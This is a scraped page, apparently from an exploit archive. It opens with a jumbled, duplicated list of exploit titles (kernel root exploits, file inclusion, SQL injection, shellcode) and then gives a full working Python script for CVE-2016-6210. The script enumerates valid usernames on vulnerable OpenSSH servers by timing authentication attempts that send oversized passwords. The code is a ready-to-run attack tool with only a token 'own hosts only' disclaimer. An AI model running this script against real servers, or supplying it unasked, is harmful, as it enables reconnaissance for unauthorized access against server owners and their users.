ec03ab428f
10 new exploits Microsoft Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass Microsoft Internet Explorer XP SP2 - HTML Help Control Local Zone Bypass Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit Simplog <= 0.9.3 - (tid) Remote SQL Injection Exploit Simplog 0.9.3 - (tid) SQL Injection Skulltag <= 0.96f - (Version String) Remote Format String PoC OpenTTD <= 0.4.7 - Multiple Vulnerabilities/Denial of Service Exploit Skulltag 0.96f - (Version String) Remote Format String PoC OpenTTD 0.4.7 - Multiple Vulnerabilities Apple Mac OS X Safari <= 2.0.3 (417.9.2) - Multiple Vulnerabilities (PoC) Apple Mac OS X Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities Apple Mac OS X Safari <= 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC Apple Mac OS X Safari 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC Aardvark Topsites PHP <= 4.2.2 - (path) Remote File Inclusion phpMyAgenda <= 3.0 Final (rootagenda) Remote Include Aardvark Topsites PHP <= 4.2.2 - (lostpw.php) Remote Include Exploit Aardvark Topsites PHP 4.2.2 - (path) Remote File Inclusion phpMyAgenda 3.0 Final - (rootagenda) Remote Include Aardvark Topsites PHP 4.2.2 - (lostpw.php) Remote File Inclusion X7 Chat <= 2.0 - (help_file) Remote Commands Execution Exploit X7 Chat 2.0 - (help_file) Remote Command Execution Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit Auction 1.3m - (phpbb_root_path) Remote File Inclusion acFTP FTP Server <= 1.4 - (USER) Remote Buffer Overflow PoC Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow PoC Quake 3 Engine 1.32b - R_RemapShader() Remote Client BoF Exploit AWStats <= 6.5 - (migrate) Remote Shell Command Injection Exploit AWStats 6.5 - (migrate) Remote Shell Command Injection acFTP FTP Server <= 1.4 - (USER) Remote Denial of Service Exploit acFTP FTP Server 1.4 - (USER) Remote Denial of Service PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities Jetbox CMS <= 2.1 - (relative_script_path) Remote File Inclusion Exploit ACal <= 2.2.6 - (day.php) Remote File Inclusion EQdkp <= 1.3.0 - (dbal.php) Remote File Inclusion PHP-Fusion 6.00.306 - Multiple Vulnerabilities Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion ACal 2.2.6 - (day.php) Remote File Inclusion EQdkp 1.3.0 - (dbal.php) Remote File Inclusion Microsoft Internet Explorer <= 6.0.2900 SP2 - (CSS Attribute) Denial of Service Microsoft Internet Explorer 6.0.2900 SP2 - (CSS Attribute) Denial of Service Unclassified NewsBoard <= 1.6.1 patch 1 - Arbitrary Local Inclusion Exploit Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (1) Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2) Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3) Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (1) Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (2) Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (3) Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4) Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (4) Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit Linux Kernel <= 2.6.17.4 - 'proc' Local Root Exploit Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit \o - Local File Inclusion (1st) Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1) PulseAudio setuid (Ubuntu 9.04 & Slackware 12.2.0) - Local Privilege Escalation PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation Linux Kernel < 2.6.36-rc6 (Redhat/Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept Linux Kernel < 2.6.36-rc6 (Redhat / Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept Linux Kernel <= 2.2.18 (RH 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1) Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1) Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes) Django CMS 3.3.0 - (Editor Snippet) Persistent XSS Drupal RESTWS Module 7.x - Remote PHP Code Execution (Metasploit) Linux/x86 - execve /bin/sh Shellcode (19 bytes) Wowza Streaming Engine 4.5.0 - Local Privilege Escalation Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation Wowza Streaming Engine 4.5.0 - Add Advanced Admin CSRF Wowza Streaming Engine 4.5.0 - Multiple XSS OpenSSHD <= 7.2p2 - Username Enumeration WordPress Video Player Plugin 1.5.16 - SQL Injection
157 lines
6.2 KiB
Python
Executable file
157 lines
6.2 KiB
Python
Executable file
#!/usr/bin/python
|
|
#
|
|
# CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari)
|
|
#
|
|
# Author: 0_o -- null_null
|
|
# nu11.nu11 [at] yahoo.com
|
|
# Oh, and it is n-u-one-one.n-u-one-one, no l's...
|
|
# Wonder how the guys at packet storm could get this wrong :(
|
|
#
|
|
# Date: 2016-07-19
|
|
#
|
|
# Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210.
|
|
#
|
|
# Prerequisites: Network access to the SSH daemon.
|
|
#
|
|
# DISCLAIMER: Use against your own hosts only! Attacking stuff you are not
|
|
# permitted to may put you in big trouble!
|
|
#
|
|
# And now - the fun part :-)
|
|
#
|
|
|
|
|
|
import paramiko
|
|
import time
|
|
import numpy
|
|
import argparse
|
|
import sys
|
|
|
|
args = None
|
|
|
|
class bcolors:
|
|
HEADER = '\033[95m'
|
|
OKBLUE = '\033[94m'
|
|
OKGREEN = '\033[92m'
|
|
WARNING = '\033[93m'
|
|
FAIL = '\033[91m'
|
|
ENDC = '\033[0m'
|
|
BOLD = '\033[1m'
|
|
UNDERLINE = '\033[4m'
|
|
|
|
|
|
def get_args():
|
|
parser = argparse.ArgumentParser()
|
|
group = parser.add_mutually_exclusive_group()
|
|
parser.add_argument("host", type = str, help = "Give SSH server address like ip:port or just by ip")
|
|
group.add_argument("-u", "--user", type = str, help = "Give a single user name")
|
|
group.add_argument("-U", "--userlist", type = str, help = "Give a file containing a list of users")
|
|
parser.add_argument("-e", "--enumerated", action = "store_true", help = "Only show enumerated users")
|
|
parser.add_argument("-s", "--silent", action = "store_true", help = "Like -e, but just the user names will be written to stdout (no banner, no anything)")
|
|
parser.add_argument("--bytes", default = 50000, type = int, help = "Send so many BYTES to the SSH daemon as a password")
|
|
parser.add_argument("--samples", default = 12, type = int, help = "Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users")
|
|
parser.add_argument("--factor", default = 3.0, type = float, help = "Used to compute the upper timing boundary for user enumeration")
|
|
parser.add_argument("--trials", default = 1, type = int, help = "try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary")
|
|
args = parser.parse_args()
|
|
return args
|
|
|
|
|
|
def get_banner(host, port):
|
|
ssh = paramiko.SSHClient()
|
|
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
|
try:
|
|
ssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = 'invalidinvalidinvalid')
|
|
except:
|
|
banner = ssh.get_transport().remote_version
|
|
ssh.close()
|
|
return banner
|
|
|
|
|
|
def connect(host, port, user):
|
|
global args
|
|
starttime = 0.0
|
|
endtime = 0.0
|
|
p = 'B' * int(args.bytes)
|
|
ssh = paramiko.SSHClient()
|
|
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
|
starttime=time.clock()
|
|
try:
|
|
ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False)
|
|
except:
|
|
endtime=time.clock()
|
|
finally:
|
|
ssh.close()
|
|
return endtime - starttime
|
|
|
|
|
|
|
|
def main():
|
|
global args
|
|
args = get_args()
|
|
if not args.silent: print("\n\nUser name enumeration against SSH daemons affected by CVE-2016-6210")
|
|
if not args.silent: print("Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\n\n")
|
|
if args.host:
|
|
host = args.host.split(":")[0]
|
|
try:
|
|
port = int(args.host.split(":")[1])
|
|
except IndexError:
|
|
port = 22
|
|
users = []
|
|
if args.user:
|
|
users.append(args.user)
|
|
elif args.userlist:
|
|
with open(args.userlist, "r") as f:
|
|
users = f.readlines()
|
|
else:
|
|
if not args.silent: print(bcolors.FAIL + "[!] " + bcolors.ENDC + "You must give a user or a list of users")
|
|
sys.exit()
|
|
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing SSHD at: " + bcolors.BOLD + str(host) + ":" + str(port) + bcolors.ENDC + ", Banner: " + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC)
|
|
# get baseline timing for non-existing users...
|
|
baseline_samples = []
|
|
baseline_mean = 0.0
|
|
baseline_deviation = 0.0
|
|
if not args.silent: sys.stdout.write(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Getting baseline timing for authenticating non-existing users")
|
|
for i in range(1, int(args.samples) + 1):
|
|
if not args.silent: sys.stdout.write('.')
|
|
if not args.silent: sys.stdout.flush()
|
|
sample = connect(host, port, 'foobar-bleh-nonsense' + str(i))
|
|
baseline_samples.append(sample)
|
|
if not args.silent: sys.stdout.write('\n')
|
|
# remove the biggest and smallest value
|
|
baseline_samples.sort()
|
|
baseline_samples.pop()
|
|
baseline_samples.reverse()
|
|
baseline_samples.pop()
|
|
# do math
|
|
baseline_mean = numpy.mean(numpy.array(baseline_samples))
|
|
baseline_deviation = numpy.std(numpy.array(baseline_samples))
|
|
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline mean for host " + host + " is " + str(baseline_mean) + " seconds.")
|
|
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline variation for host " + host + " is " + str(baseline_deviation) + " seconds.")
|
|
upper = baseline_mean + float(args.factor) * baseline_deviation
|
|
if not args.silent: print(bcolors.WARNING + "[*] " + bcolors.ENDC + "Defining timing of x < " + str(upper) + " as non-existing user.")
|
|
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing your users...")
|
|
#
|
|
# Get timing for the given user name...
|
|
#
|
|
for u in users:
|
|
user = u.strip()
|
|
enum_samples = []
|
|
enum_mean = 0.0
|
|
for t in range(0, int(args.trials)):
|
|
timeval = connect(host, port, user)
|
|
enum_samples.append(timeval)
|
|
enum_mean = numpy.mean(numpy.array(enum_samples))
|
|
if (enum_mean < upper):
|
|
if not (args.enumerated or args.silent) :
|
|
print(bcolors.FAIL + "[-] " + bcolors.ENDC + user + " - timing: " + str(enum_mean))
|
|
else:
|
|
if not args.silent:
|
|
print(bcolors.OKGREEN + "[+] " + bcolors.ENDC + user + " - timing: " + str(enum_mean))
|
|
else:
|
|
print(user)
|
|
|
|
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|
|
|